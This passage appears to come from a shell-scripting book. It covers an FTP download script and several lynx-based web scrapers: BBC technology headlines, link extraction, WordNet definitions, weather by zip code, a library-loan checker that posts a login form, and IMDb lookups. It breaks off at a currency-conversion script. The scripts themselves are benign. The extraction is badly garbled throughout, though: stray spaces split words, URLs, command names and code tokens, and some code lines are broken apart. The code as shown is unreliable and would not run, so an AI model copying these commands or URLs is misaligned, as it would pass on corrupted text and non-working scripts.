3 94 777 byt es re ce ived in 00:01 (26 2 . 39 K B /s )
2 21 Go o dby e.
- rw -r- - r-1 t ay lor
sta ff 3 9 477 7 Oct 1 3 20 :3 2 n cf t p- 3 .1 .5 - sr c. t ar .b z 2
If your f tp is excessively verbose, you can quiet it down by adding a -V flag to the f tp invocation (that is, instead of
f tp -n, use ft p -nV).
An alternative to ftpget

Worth noting is that there's a popular utility called cu r l that


performs the same task as f t pg et . If you have c ur l available, it's
a superior alternative to this script, but because we're going to build
upon the ideas embodied in f t pg e t for more sophisticated f tp
interactions later in this book, you'll benefit from studying the code
here.

Hacking the Script


This script can be expanded to uncompress the downloaded file automatically (see Script #37, Working with
Compressed Files, for an example of how to do this).
You can also tweak this script just a bit and end up with a simple tool for uploading a specified file to an FTP server. If
the server supports anonymous connections (few do nowadays, thanks to skript kiddies and other delinquents, but that's
another story), all you really have to do is specify a destination directory on the command line (or in the script) and
change the g et to a p ut in the main script:
f tp -n << EO F
o pe n $ s erv er
u se r f t p $ an onp as s
c d $de s tdi r
p ut $f i len am e
q ui t
E OF

To work with a password-protected account, you could hard-code your password into the script a very bad idea or
you could have the script prompt for the password interactively. To do that, turn off echoing before a re ad statement,
and then turn it back on when you're done:
e ch o - n "P as swo rd for ${u ser}: "
s tt y - e cho
r ea d p a ssw or d
s tt y e c ho
e ch o " "
A smarter way to prompt for a password, however, is to just let the ft p program do the work itself, as demonstrated in
Script #81, Synchronizing Directories with FTP.

#60 Tracking BBC News with lynx


As I mentioned earlier, one of the unsung heroes of the command-line Internet is unquestionably the ly n x web
browser (or its newer sibling lin ks). Although you can use it to surf the Web if you dislike graphics, its real power is
accessed on the command line itself, within a shell script.
The -d u mp flag, for example, produces the text but not the HTML source, as shown in the following when checking the
BBC World Service website, tracking technology news:
$ u rl= h ttp :/ /ne ws .bbc .co. uk/2/ l ow/ t e chn o l og y/ de f au lt . st m
$ l ynx -du mp $u rl | h ead
[1] S kip t o m ai n co nten t
BBC NEW S / T EC HNOL OGY
[2] G rap hi cs ve rsio n | [3]Ch a nge t o U K Ed it io n | [ 4 ]B B C Sp o rt H o me
_ _ ___ __ ___ __ ____ ____ _____ _ ___ _ _ ___ _ _ __ __ __ _ __ __ _ __ _ __ __ _ __ __ _ __ __
[5] N ews F ron t Page | [ 6]Afr i ca | [7] A m er ic as | [8 ] As i a- Pa c if ic |
[9] E uro pe | [1 0]Mi ddle East | [ 1 1 ]So u t h As ia | [1 2 ]U K | [ 1 3] Bu s in es s |
[14 ] Hea lt h | [ 15]S cien ce/Na t ure | [1 6 ] Te ch no l og y | [ 1 7] En t er ta i nm en t |
[18 ] Hav e You r Say
This output is not very interesting, but it's easily fed to g rep or any other command-line utility, because it's just a text
stream at this juncture. Now we can easily check a website to see if there are any stories about a favorite news topic,
computer company, or group of people. Let's see if there's any news about games, with a one-line context shown
around each match, by using grep:
$ l ynx -du mp $u rl | g rep -C1 - i ga m e s
[21 ] Scr ee nsh ot fro m Vi ce Ci t y [ 2 2 ]Br i t on s' l o ve a f fa i r wi t h ga m es
Bri t ain i s t ur ning int o a n a tio n of k e en g am e rs , r es e ar ch by t h e UK
gam e s i nd ust ry tra de b ody s u gge s t s.
--

--

--

--

lin e -up
Man y of t he Ni nten do g ames f or t h e C h r is tm as ru n- u p r et ur n t o f am il i ar
cha r act er s a nd bra nd n ames.
Vir t ual p ets f ed b y ph otos a nd p r onu n c ia ti on pu zz l es ar e j us t s om e o f
the mob il e p ho ne g ames popu l ar i n Ja p a n.
[28 ] Nex t gen c onso les spark con c e rn
The nex t gen er atio n of cons o les c oul d sh ak e u p th e g a me s i nd us t ry ,
wit h sm al ler f irms goi ng bu s t, s a y e x p er ts .
[37 ] Tex t msg s play gam es wi t h T V
You r TV a nd mo bile are comi n g c l o ser t og et he r , wi t h g am e s ho ws pl ay e d
[38 ] Mob il e g am ing 'set to e x plo d e '
Con s ume rs wi ll be spen ding m ill i o ns o f p ou nd s t o p la y g am e s on th ei r
mob i les b y n ex t ye ar, say e x per t s .

The numbers in brackets are URL references listed later in the output, so to identify the [ 3 7] link, the page needs to
be requested again, this time having g rep find the associated link URL:
$ l ynx -du mp $u rl | g rep '37\. '
3 7. h ttp :/ /ne ws .bbc .co. uk/2/ l ow/ t e chn o l og y/ 31 8 26 41 . st m
Switch to -sou rc e rather than -dum p, and the output of l ynx becomes considerably more interesting.
$ l ynx -so ur ce $u rl | gre p -i ' Pub l i cat i o nD at e'
< me ta n ame =" Ori gi nalP ubli catio n Dat e " co n t en t= "2 0 03 /0 8 /2 9 1 5: 0 1: 14 " / >
The -s o urc e flag produces the HTML source of the page specified. Pipe that source into a g re p or two, and you
can extract just about any information from a page, even information within a tag or comment. The b bc n ew s script
that follows lets you easily scrape the top technology stories from the Beeb at any time.

The Code
# !/ bin / sh
# b bcn e ws - Rep or ts t he t op st o rie s on t h e BB C W or ld Se r vi ce .
u rl ="h t tp: // new s. bbc. co.u k/2/l o w/t e c hno l o gy /d ef a ul t. s tm "
l yn x - s our ce $u rl | \
s ed - n ' /L ast U pdat ed:/ ,/new s sea r c h.b b c .c o. uk / p' | \
s ed ' s/< /\
< /g ;s/ > />\
/ g' | \
g rep -v -E '( <| >)' | \
f mt | \
u niq

How It Works
Although this is a short script, it is rather densely packed. These scraper scripts are best built iteratively, looking for
patterns to filter in the structure of the web page information and then tuned line by line to produce just the output
desired.
On the BBC website, this process is surprisingly easy because we're already looking at the low-bandwidth version of
the site. The first task is to discard any HTML associated with the navigational menus, bottom material, and so forth, so
that we just have the core content of the page, the stories themselves. That's what the first s e d does it reduces the
data stream by preserving only the headline and body of the new stories between the "Last Updated" string at the top
of the page and the n ews se arch .bbc .co. u k /p search box at the bottom of the page.
The next invocation of sed is uglier than the first, simply because it's doing something peculiar:
s ed ' s/< /\
< /g ;s/ > />\
/ g'
Every time it finds an open angle bracket (< ), it's replacing it with a carriage return followed by an open angle bracket.
Close angle brackets (> ) are replaced by a close angle bracket followed by a carriage return. If s ed supported an \n
notation to specify carriage returns, the second s e d invocation would not need to be written across three lines and
would read much more easily, as follows:
s ed 's / </\ n< /g; s/ >/>\ n/g'
Once the added carriage returns put all the HTML tags on their own lines, the second invocation of gr ep strips out all
the tags (-v inverts the logic of the g rep, showing all lines that do not match the pattern, and the - E flag specifies
that the argument is a complex regular expression), and the result is fed to f m t to wrap the resultant text lines better.
Finally, the u niq command is used to ensure that there aren't multiple blank lines in the output: It removes all
nonunique lines from the data stream.

Running the Script


This script has no arguments, and as long as the BBC hasn't changed its basic low-source page layout, it'll produce a
text-only version of the top technology headlines. The first version of the b b cn e ws script was written around a layout
that changed during the summer of 2003: The BBC originally had all its articles wrapped in < di v > tags but has since
changed it. Fortunately, the update to the script involved only about ten minutes of work.

The Results
Here's the top technology news at the end of August 2003:
$ b bcn e ws | hea d -20
L as t U p dat ed :
Fr iday , 29 Augu s t, 2 0 03, 1 5: 01 G M T 16 : 01 UK
Y outh s usp e c ted o f ne t a tt ac k
A n Ame r ica n you t h i s su s pe ct e d b y th e F BI
o f bei n g o n e of t he a ut h or s o f t he c r ip pl i ng
M SBlas t in t e rne t wo rm , s ay r e po r ts .
B riton s ' l o v e a f f ai r wi t h ga m es

B ritai n is t urn i n g in to a na t io n o f k ee n
g amers , re s e arc h by t he UK g a me s i nd u st ry
t rade b ody s ugg e s ts .
F amili a r f a c es i n N in te n do 's li n e- up
M any o f th e Nin t e nd o ga m es f o r t he C h ri st m as
r un-up ret u r n t o fa mi li a r ch a ra c te rs an d
b rand n ame s .

Hacking the Script


With a little more tuning, you could easily have the top technology story from the BBC News pop up each time you log
in to your account. You could also email the results to your mailbox via a c r on job every so often, if you wanted:
b bc new s | ma il -s "BB C Te chnol o gy N e ws" p et er
Don't send it to a list, though; there are some copyright and intellectual property issues to consider if you begin
republishing Internet content owned by other people. There's a fine line between fair use and violation of copyright, so
be thoughtful about what you do with content from another website.

#61 Extracting URLs from a Web Page


A straightforward shell script application of l y n x is to extract a list of URLs on a given web page, which can be quite
helpful in a variety of situations.

The Code
# ! / b in /s h
# g e tl in ks - Giv e n a U RL, ret u r n s a l l o f i t s i n t e r n a l a n d
#
ex te rna l lin k s.
i f [ $ # -eq 0 ] ; the n
e c ho " Usa g e: $ 0 [-d | -i|- x] u r l " > & 2
e c ho " -d= d omai n s on l y, - i=i n t e r n a l r e f s o n l y , - x = e x t e r n a l o n l y " > & 2
e x it 1
fi
i f [ $ # -gt 1 ] ; the n
c a se " $1" in
-d ) las t cmd= " cut - d/ - f3 | s o r t | u n i q "
shi f t
;;
-i ) bas e doma i n="h t tp:/ /$( e c h o $ 2 | c u t - d / - f 3 ) / "
las t cmd= " grep \"^$ bas e d o m a i n \ " | s e d \ " s | $ b a s e d o m a i n | | g \ " | s o r t | u n i q "
shi f t
;;
-x ) bas e doma i n="h t tp:/ /$( e c h o $ 2 | c u t - d / - f 3 ) / "
las t cmd= " grep -v \ "^$ b a s e d o m a i n \ " | s o r t | u n i q "
shi f t
;;
* ) ech o "$0 : unk n own opt i o n s p e c i f i e d : $ 1 " > & 2 ; e x i t 1
e s ac
else
l a st cm d=" s ort | uni q "
fi
l y n x - du mp " $1" | \
s e d -n '/ ^ Refe r ence s $/,$ p' | \
g r ep - E ' [ [:di g it:] ] +\.' | \
a w k '{ pri n t $2 } ' | \
c u t -d \? - f1 | \
e v al $ las t cmd
exit 0

How It Works
When displaying a page, l ynx shows the text of the page, formatted as best it can, followed by a list of all hypertext
references, or links, found on that page. This script simply extracts just the links by using a s e d invocation to print
everything after the "References" string in the web page text, and then processes the list of links as needed based on
the user-specified flags.
The one interesting technique demonstrated by this script is the way the variable l a s t c m d is set to filter the list of
links that it extracts according to the flags specified by the user. Once l a s t c m d is set, the amazingly handy e v a l
command is used to force the shell to interpret the content of the variable as if it were a command, not a variable.

Running the Script


By default, this script outputs a list of all links found on the specified web page, not just those that are prefaced with
h t t p :. There are three optional command flags that can be specified to change the results, however: - d produces
just the domain names of all matching URLs, - i produces a list of just the internal references (that is, those
references that are found on the same server as the current page), and - x produces just the external references,
those URLs that point to a different server.

The Results
A simple request is a list of all links on a specified website home page:
$ g e tl in ks h ttp: / /www . triv ial . n e t /
h t t p :/ /w ww. i ntui t ive. c om/
h t t p :/ /w ww. t rivi a l.ne t /kud os/ i n d e x . h t m l

h t t p :/ /w ww. t rivi a l.ne t /tri via l . c g i


m a i l to :n erd s @tri v ial. n et
Another possibility is to request a list of all domain names referenced at a specific site. This time let's first use the
standard Unix tool wc to check how many links are found overall:
$ g e tl in ks h ttp: / /www . amaz on. c o m / | w c - l
1 36
Amazon has 136 links on its home page. Impressive! Now, how many different domains does that represent? Let's
generate a full list with the -d flag:
$ g e tl in ks - d ht t p:// w ww.a maz o n . c o m /
s 1 . a ma zo n.c o m
w w w . am az on. c om
As you can see, Amazon doesn't tend to point anywhere else. Other sites are different, of course. As an example,
here's a list of all external links in my weblog:
$ g e tl in ks - x ht t p:// w ww.i ntu i t i v e . c o m / b l o g /
L Y N X IM GM AP: h ttp: / /www . intu iti v e . c o m / b l o g / # h e a d e r m a p
h t t p :/ /b log a rama . com/ i n.ph p
h t t p :/ /b log d ex.m e dia. m it.e du/
h t t p :/ /b ook t alk. i ntui t ive. com /
h t t p :/ /c hri s .pir i llo. c om/
h t t p :/ /c ort a na.t y pepa d .com /rt a /
h t t p :/ /d yla n .twe n ey.c o m/
h t t p :/ /f x.c r ewta g s.co m /blo g/
h t t p :/ /g eou r l.or g /nea r /
h t t p :/ /h ost i ng.v e rio. c om/i nde x . p h p / v p s . h t m l
h t t p :/ /i maj e s.in f o/
h t t p :/ /j ake . iowa g eek. c om/
h t t p :/ /m yst - tech n olog y .com /my s m a r t c h a n n e l s / p u b l i c / b l o g / 2 1 4 /
h t t p :/ /s mat t erin g .org / dryh eat /
h t t p :/ /w ww. 1 01pu b licr e lati ons . c o m / b l o g /
h t t p :/ /w ww. A Ppar e ntin g .com /
h t t p :/ /w ww. b acku p brai n .com /
h t t p :/ /w ww. b logh o p.co m /
h t t p :/ /w ww. b logh o p.co m /rat emy b l o g . h t m
h t t p :/ /w ww. b logp h iles . com/ web r i n g . s h t m l
h t t p :/ /w ww. b logs h ares . com/ blo g s . p h p
h t t p :/ /w ww. b logs t reet . com/ blo g s q l b i n / h o m e . c g i
h t t p :/ /w ww. b logw i se.c o m/
h t t p :/ /w ww. g nome - girl . com/
h t t p :/ /w ww. g oogl e .com / sear ch/
h t t p :/ /w ww. i cq.c o m/
h t t p :/ /w ww. i nfow o rld. c om/
h t t p :/ /w ww. m ail2 w eb.c o m/
h t t p :/ /w ww. m ovab l etyp e .org /
h t t p :/ /w ww. n ikon u sa.c o m/us a_p r o d u c t / p r o d u c t . j s p
h t t p :/ /w ww. o nlin e toni g ht.n et/ e t h o s /
h t t p :/ /w ww. p rocm a il.o r g/
h t t p :/ /w ww. r ings u rf.c o m/ne tri n g /
h t t p :/ /w ww. s pama s sass i n.or g/
h t t p :/ /w ww. t ryin g real l yhar d.c o m /
h t t p :/ /w ww. y ahoo . com/ r /p2

Hacking the Script


You can see where g etl i nks could be quite useful as a site analysis tool. Stay tuned: Script #77, c h e c k l i n k s ,
is a logical follow-on to this script, allowing a quick link check to ensure that all hypertext references on a site are
valid.

#62 Defining Words Online


In addition to grabbing information off web pages, a shell script can also feed certain information to a website and
scrape the data that the web page spits back. An excellent example of this technique is to implement a command that
looks up the specified word in an online dictionary and returns its definition. There are a number of dictionaries online,
but we'll use the WordNet lexical database that's made available through the Cognitive Science Department of
Princeton University.
Learn more

You can read up on the WordNet project it's quite interesting by visiting its website
directly at http://www.cogsci.princeton.edu/~wn/

The Code
# !/ bin / sh
# d efi n e - G ive n a wo rd, retur n s i t s de f i ni ti on .
u rl ="h t tp: // www .c ogsc i.pr incet o n.e d u /cg i - bi n/ we b wn 1. 7 .1 ? st ag e =1 &w o rd ="
i f [ $ # -n e 1 ] ; the n
e cho "Us ag e: $0 wor d" > &2
e xit 1
fi
l yn x - s our ce "$ ur l$1" | \
g rep -E '( ^[[ :d igit :]]+ \.| h a s [ [ : dig i t :] ]+ $) ' | \
s ed ' s/< [^ >]* >/ /g' |
( w hil e re ad li ne
do
if [ " ${ lin e: 0:3} " = "The" ] ; t hen
p art =" $(e ch o $l ine | awk '{p r i nt $ 2 }' )"
e cho " "
e cho " The $ part $1: "
el s e
e cho " $li ne " | fmt | sed 's/ ^ / / g '
fi
d one
)
e xi t 0

How It Works
Because you can't simply pass fm t an input stream as structurally complex as a word definition without completely
ruining the structure of the definition, the whil e loop attempts to make the output as attractive and readable as
possible. Another solution would be a version of fmt that wraps long lines but never merges lines, treating each line
of input distinctly, as shown in script #33, too l ong .
Worthy of note is the s ed command that strips out all the HTML tags from the web page source code:
s ed 's / <[^ >] *>/ /g '
This command removes all patterns that consist of an open angle bracket (<) followed by any combination of
characters other than a close angle bracket (> ), finally followed by the close angle bracket. It's an example of an
instance in which learning more about regular expressions can pay off handsomely when working with shell scripts.

Running the Script


This script takes one and only one argument: a word to be defined.

The Results
$ d efi n e l im n
T he ve r b l im n:
1.
d eli ne ate , limn , ou tline -- ( t rac e th e sh a pe o f )

2.
p ort ra y, de pict , li mn -- (ma k e a p o rt ra it of ; " Go y a wa n te d t o
p ort r ay hi s m is tres s, t he Du c hes s of A l ba ")
$ d efi n e v is ion ar y
T he no u n v is ion ar y:
1.
v isi on ary , illu sion ist, s eer - - ( a pe rs on wi th un u su al po we r s
o f f o res ig ht)
T he ad j ect iv e v is iona ry:
1.
a iry , imp ra ctic al, visio n ary - - ( n o t pr ac t ic al or re al i za bl e ;
s pec u lat iv e; "a iry theo ries a bou t soc i o ec on om i c im p ro v em en t ";
" vis i ona ry sc he mes for getti n g r i c h")

Hacking the Script


WordNet is just one of the many places online where you can look up words in an automated fashion. If you're more of
a logophile, you might appreciate tweaking this script to work with the online Oxford English Dictionary, or even the
venerable Webster's. A good starting point for learning about online dictionaries (and encyclopedias, for that matter) is
the wonderful Open Directory Project. Try ht t p:/ / d moz . o rg/ R ef e re nc e /D i ct io n ar ie s / to get started.

#63 Keeping Track of the Weather


Another straightforward use of website scraping that illustrates yet a different approach is a weather forecast tool.
Specify a zip code, and this script goes to the Census Bureau to obtain population and latitude/longitude information. It
visits AccuWeather to extract the current weather in that region.

The Code
# !/ bin / sh
# w eat h er - Rep or ts t he w eathe r fo r e cas t , i nc lu d in g l at / lo ng , f or a zi p c od e .
l lu rl= " htt p: //w ww .cen sus. gov/c g i-b i n /ga z e tt ee r? c it y= & st a te =& z ip ="
w xu rl= " htt p: //w ww a.ac cuwe ather . com "
w xu rl= " $wx ur l/a dc bin/ publ ic/lo c al_ i n dex _ p ri nt .a s p? zi p co d e= "
i f [ " $ 1" = "-a " ] ; then
s ize = 999 ; shi ft
e ls e
s ize = 5
fi
i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $0 [-a ] zi pcode " >& 2
e xit 1
fi
i f [ $ s ize - eq 5 ] ; then
e cho ""
# Ge t so me in fo rmat ion on th e zi p cod e fr om t h e Ce n su s B ur e au

fi

l ynx -so ur ce "$ {llu rl}$ 1" | \


se d -n ' /^< li ><st rong >/,/^ L oca t i on: / p ' | \
se d 's /< [^> ]* >//g ;s/^ //g'

# T he w eat he r f or ecas t it self a t a c c uwe a t he r. co m


l yn x - s our ce "$ {w xurl }$1" | \
s ed - n ' /< fon t clas s="s evend a yte n " >/, / [ ^[ :d ig i t: ]] < \/ f on t> / p' | \
s ed ' s/< [^ >]* >/ /g;s /^ [ ]*// g ' | \
u niq | \
h ead -$s iz e
e xi t 0

How It Works
This script provides yet another riff on the idea of using a shell script as a wrapper, though in this case the optional flag
primarily changes the amount of information filtered through the he a d at the end of the pipe. This script also takes
advantage of the natural source code organization of the two sites to slice out the population and latitude/longitude data
prefixed with the strings <s tron g> and Loc a tio n : , respectively, and then it slices out the forecast information
wrapped in a s eve nd ayt en font container.

Running the Script


The standard way to invoke this script is to specify the desired zip code. If census information is available for that
region, it'll be displayed, and the most recent weather forecast summary will be shown too. Add the -a flag, however,
and it skips the census information and reports a full ten-day forecast.

The Results
$ w eat h er 66 207

Z ip Co d e: 66 207
PO N ame: Shaw n ee M i ssi o n ( KS )
P op ula t ion ( 199 0) : 13 863
L oc ati o n: 38 .95 74 72 N , 94 .6451 9 3 W
C ur ren t ly at 10 :3 5 PM
C LE AR
W in ds SW
at 4 m ph.
T em p: 2 8 / R F 2 6. UV Inde x 0.
A typical winter evening in Kansas: a warm 28 degrees Fahrenheit. Brrrrr.

#64 Checking for Overdue Books at the Library


Most of the lyn x-related scripts in this book are built around either passing information to a web server via a
m et hod = get form transmission (the passed information is appended to the URL, with a ? separating the URL and its
data) or simply scraping information from predefined web page content. There's a third category of page, however, that
uses a metho d=p os t form transmission for submitting information from the web browser to the remote server.
While more difficult, this method can also be emulated using lyn x , as this script shows. This specific script sends a
data stream to the Boulder (Colorado) Public Library website, logging the specified user in and extracting a list of books
and other items checked out, with due dates. Notice in particular the creation and use of the p os t da ta temporary
file.

The Code
# !/ bin / sh
# c hec k lib ra ry - Logs in to th e Bo u l der P ub li c L ib ra r y c om pu t er
#
s yst em an d show s th e due dat e of e v er yt hi n g ch e ck e d ou t f or
#
t he sp eci fi ed u ser. A de m ons t r ati o n o f ho w t o w or k w it h t he
#
m eth od ="p os t" f orm with l ynx .
l ib 1=" h ttp :/ /ne ll .bou lder .lib. c o.u s / pat r o ni nf o"
l ib 2=" i tem s"
l ib acc t db= "$ HOM E/ bin/ .lib rary. a cco u n t.i n f o"
p os tda t a=" /t mp/ $( base name $0). $ $"
a wk dat a ="/ tm p/$ (b asen ame $0).a w k.$ $ "
# W e n e ed:
nam e
ca rdno
re c ord n o
#
Giv e n t he fi rs t, l ook for t h e o t h er t w o in t h e li b ra r y ac c ou nt da ta b as e
i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $( base name $0) \ "ca r d ho l d er \" "; ex it 0
fi
a cc tin f o=" $( gre p -i " $1" $liba c ctd b ) "
n am e=" $ (ec ho $a cc tinf o | cut - d : - f 1 | s e d 's / / +/ g' ) "
c ar dno = "$( ec ho $a ccti nfo | cut -d: - f2) "
r ec ord n o=" $( ech o $acc tinf o | c u t - d : -f 3 ) "
i f [ - z "$ ac cti nf o" ] ; t hen
e cho "Pr ob lem : acco unt \"$1\ " no t fou n d i n li b ra ry ac c ou nt da ta b as e. "
e xit 1
e li f [ $(g re p - i "$1" $li bacct d b | w c - l ) - gt 1 ] ; t he n
e cho "Pr ob lem : acco unt \"$1\ " ma t c hes m or e th a n on e r e co rd in l i br ar y d b. "
e xit 1
e li f [ -z "$ car dn o" - o -z "$re c ord n o " ] ; t he n
e cho "Pr ob lem : card or recor d in f o rma t i on c or r up te d i n d at a ba se . "
e xit 1
fi
t ra p " / bin /r m - f $pos tdat a $aw k dat a " 0
c at << EOF > $p os tdat a
n am e=$ { nam e} &co de =${c ardn o}&su b mit = D isp l a y+ re co r d+ fo r +p e rs on + na me d +a bo v e
E OF
c at << "EO F" > $a wkda ta
{ i f ( NR % 3 = = 1) { tit le=$0 }
i f ( NR % 3 = = 2) { pri nt $0 "|" t itl e }
}
E OF
l yn x - s our ce -p os t-da ta " $lib1 / $re c o rdn o / $l ib 2" < $p o st d at a | \
g rep -E '( ^<t d |nam e=\" renew ) ' | \
s ed ' s/< [^ >]* >/ /g'
| \

a wk - f $ aw kda ta | s ort
e xi t 0

How It Works
To get your own version of this script working with your own public library (or similar system), the basic technique is to
browse to the page on the system website at which you must submit your account information. In the case of this
script, that page is h ttp :/ /nel l.bo ulde r . lib . c o.u s / pa tr on i nf o . Then, on that page, use the View
Source capability of your browser to identify the names of the form input elements into which you must submit your
account information. In the case of this script, the two input text elements are n a me and c od e (library card number).
To duplicate that, I have stored the required information in the $po s td a ta file:
n am e=$ { nam e} &co de =${c ardn o}&su b mit = D isp l a y+ re co r d+ fo r +p e rs on + na me d +a bo v e
I then use this information to populate the input elements by passing the information to l yn x:
l yn x - s our ce -p os t-da ta " $lib1 / $re c o rdn o / $l ib 2" < $p o st d at a
The account information used in the temporary $ pos t d ata file, as well as in other places in the script, is stored in a
shared database library called . libr ary.a c cou n t .in f o , which you must build by hand. The toughest part of
building this account database was identifying the internal library ID of my account, but again, the View Source
capability of a modern browser is all that's needed: I just logged in to the library database itself with my name and card
number and then looked at the source code of the resultant page. Buried in the data was the line
< A HRE F ="/ pa tro ni nfo/ 1201 9/ite m s"
Voil! I then stored my internal ID value, 12019, in the library account information database file.
Finally, the a wk script makes the output prettier:
i f ( N R % 3 == 1) { t itle =$0 }
i f ( N R % 3 == 2) { p rint $0 " | " t i t le }
It joins every second and third line of the output, with the first line of each discarded, because it's not necessary for the
desired output information. The end result is quite readable and attractive.

Running the Script


To run this script, simply specify a pattern that uniquely identifies one person in the library account database on your
machine. My account database looks like the following:
$ c at ~ /.l ib rar y. acco unt. info
# n ame : c ar d n um ber : li brary int e r nal I D
D av e T a ylo r: D00 60 681: 1201 9
Special note

In the interest of not blasting my library card number throughout the known universe, the
data file shown for this script is not exactly correct. Therefore, you won't be able to run the
script and find out what books I have checked out, but the general concept is still
informative.

The Results
It's a simple matter to
$ c hec k lib ra ry
DU E 0 9 -06 -0 3
DU E 0 9 -06 -0 3
DU E 0 9 -06 -0 3
DU E 0 9 -06 -0 3
DU E 0 9 -06 -0 3
DU E 0 9 -06 -0 3
DU E 0 9 -06 -0 3
DU E 0 9 -06 -0 3
DU E 0 9 -06 -0 3

see what's due:


Da ve
| Duke the lost eng i n e/ W . A wd ry ;
| Farm er W ill / Jan e Cow e n -F le tc h e
| Five lit tle m o nke y s ju m p in g on t
| Five lit tle m o nke y s si t t in g in a
| Main lin e eng i nes / W. A w dr y ; w i
| Now we c an ha v e a w edd i n g! / J u d
| The eagl e cat c her / by M a rg ar et C
| The summ er ca t / s t o ry a n d pi ct u r
| The temp est : [a n o vel ] / Ju an M

Hacking the Script


There are further levels of sophistication that can be added to this script, the most useful of which is to compare the
date string values for today, tomorrow, and the following day with the due dates in the script output to enable warnings
of books due in the next few days.

Another useful addition is a wrapper that can be called from c r o n to automatically email the results of the
c he ckl i bra ry script on a schedule. This is also easily done:
# !/ bin / sh
# b ook s due - Em ai ls r esul ts of che c k lib r a ry s cr i pt .
c he ckl i bra ry ="$ HO ME/b in/c heckl i bra r y "
r es ult s ="/ tm p/r es ults .$$"
t o= "ta y lor @i ntu it ive. com"
t ra p " / bin /r m - f $res ults " 0
$ ch eck l ibr ar y D av e

> $resu l ts

i f [ ! -s $r esu lt s ] ; th en
e xit 0
# no book s che c ked o ut!
fi
( e cho
e cho
e cho
e cho

"Su bj ect : Boul der Publi c Li b r ary - B oo ks Du e"


"To : $to "
"Fr om : ( Th e Li brar y Scr a per ) www @ i nt ui ti v e. co m "
""

c at $ res ul ts
) | se n dma il -t
e xi t 0
Notice that if no books are checked out, the script exits without sending any email, to avoid annoying "no books
checked out" kinds of messages.

#65 Digging Up Movie Info from IMDb


A more sophisticated use of Internet access through ly n x and a shell script is demonstrated in this hack, which
searches the Internet Movie Database website (h ttp : / /ww w . im db .c o m/ ) to find films that match a specified
pattern. What makes this script interesting is that it must be able to handle two different formats of return information: If
the search pattern matches more than one movie, mo v i eda t a returns a list of possible titles, but if there's exactly
one movie match, the information about that specific film is returned.
As a result, the script must cache the return information and then search through it once to see if it provides a list of
matches and then a second time if it proves to be a summary of the film in question.

The Code
# !/ bin / sh
# m ovi e dat a - G iv en a mov ie ti t le, r etu r n s a li s t of ma t ch es , i f
#
th e re' s mor e than one , or a sy n o psi s of t he mo vi e i f t he r e' s
#
ju s t o ne . U se s th e In terne t Mo v i e D a t ab as e ( im db . co m ).
i md bur l ="h tt p:/ /u s.im db.c om/Ts e arc h ? res t r ic t= Mo v ie s+ o nl y &t it l e= "
t it leu r l=" ht tp: // us.i mdb. com/T i tle ? "
t em pou t ="/ tm p/m ov ieda ta.$ $"
s um mar i ze_ fi lm( )
{
# P r odu ce an a ttra ctiv e syn o psi s of t h e fi lm

gre p "^ <t itl e> " $t empo ut | s ed ' s /<[ ^ > ]* >/ /g ; s/ (m o re ) // '
gre p '< b cla ss ="ch ">Pl ot Ou t lin e : </b > ' $ te mp o ut | \
s e d ' s/ <[^ >] *>// g;s/ (more ) //; s / (vi e w t ra il e r) // ' | f mt |s e d 's / ^/ / '
exi t 0

t ra p " r m - f $te mp out" 0 1 15


i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $0 {mo vie title | m o v ie I D }" > &2
e xit 1
fi
f ix edn a me= "$ (ec ho $@ | tr ' ' ' +') "

# f or t h e UR L

i f [ $ # -e q 1 ] ; the n
n odi g its =" $(e ch o $1 | s ed 's / [[: d i git : ] ]* // g' ) "
i f [ -z "$ nod ig its" ] ; then
ly n x - so urc e "$ti tleu rl$fi x edn a m e" > $t em po u t
su m mar iz e_f il m
fi
fi
u rl ="$ i mdb ur l$f ix edna me"
l yn x - s our ce $u rl > $ temp out
i f [ ! -z "$ (gr ep "IM Db t itle s ear c h " $ t e mp ou t" ] ; t he n
g rep 'HR EF ="/ Ti tle? ' $t empou t | \
se d 's /< OL> <L I><A HRE F="// ; s/< \ / A>< \ / LI >/ /; s /< LI > <A HR EF = "/ /' | \
se d 's /" >/ -- /;s /<.* //;s/ \ /Ti t l e?/ / ' | \
so r t - u | \
mo r e
e ls e
s umm a riz e_ fil m
fi
e xi t 0

How It Works
This script builds a different URL depending on whether the command argument specified is a film name or an IMDb
film ID number, and then it saves the lynx output from the web page to the $ te m po ut file.
If the command argument is a film name, the script then examines $ t em po u t for the string "IMDb title search" to see
whether the file contains a list of film names (when more than one movie matches the search criteria) or the description
of a single film. Using a complex series of sed substitutions that rely on the source code organization of the IMDb site,
it then displays the output appropriately for each of those two possible cases.

Running the Script


Though short, this script is quite flexible with input formats: You can specify a film title in quotes or as separate words.
If more than one match is returned, you can then specify the eight-digit IMDb ID value to select a specific match.

The Results
$ m ovi e dat a law re nce of a rabia
0 05 617 2 -- L awr en ce o f Ar abia ( 196 2 )
0 09 935 6 -- D ang er ous Man: Lawr e nce A fte r Ar ab ia , A ( 1 99 0 ) (T V )
0 19 454 7 -- W ith A llen by i n Pal e sti n e an d La wr en c e in Ar a bi a ( 19 19 )
0 24 522 6 -- L awr en ce o f Ar abia ( 193 5 )
0 36 376 2 -- L awr en ce o f Ar abia: A C o n ver s a ti on w i th S t ev e n Sp i el be r g (2 0 00 ) ( V)
0 36 379 1 -- M aki ng of 'Law rence of A r abi a ' , Th e ( 20 00 ) ( V )
$ m ovi e dat a 005 61 72
L aw ren c e o f Ara bi a (1 962)
P lot Out li ne: B riti sh l ieute n ant T .E. L aw re nc e r ew r it e s th e p ol i ti ca l
h ist o ry of Sa ud i Ar abia .
$ m ovi e dat a mon so on w eddi ng
M on soo n We dd ing ( 2001 )
P lot Out li ne: A str esse d fat h er, a br i d e- to -b e w it h a se cr e t, a
s mit t en ev ent p lann er, and r e lat i v es f r om a ro u nd t h e w or ld cr ea t e
m uch ado a bou t the prep arati o ns f o r a n ar ra ng e d ma r ri a ge i n I nd i a.

Hacking the Script


The most obvious hack to this script would be to get rid of the ugly IMDb movie ID numbers. It would be
straightforward to hide the movie IDs (because the IDs as shown are rather unfriendly and prone to mistyping) and
have the shell script output a simple menu with unique index values (e.g., 1, 2, 3) that can then be typed in to select a
particular film.
A problem with this script, as with most scripts that scrape values from a third-party website, is that if IMDb changes its
page layout, the script will break and you'll need to rebuild the script sequence. It's a lurking bug, but with a site like
IMDb that hasn't changed in years, probably not a dramatic or dangerous one.

#66 Calculating Currency Values


A particularly interesting use of shell scripts is to offer a command-line currency conversion routine. This proves to be
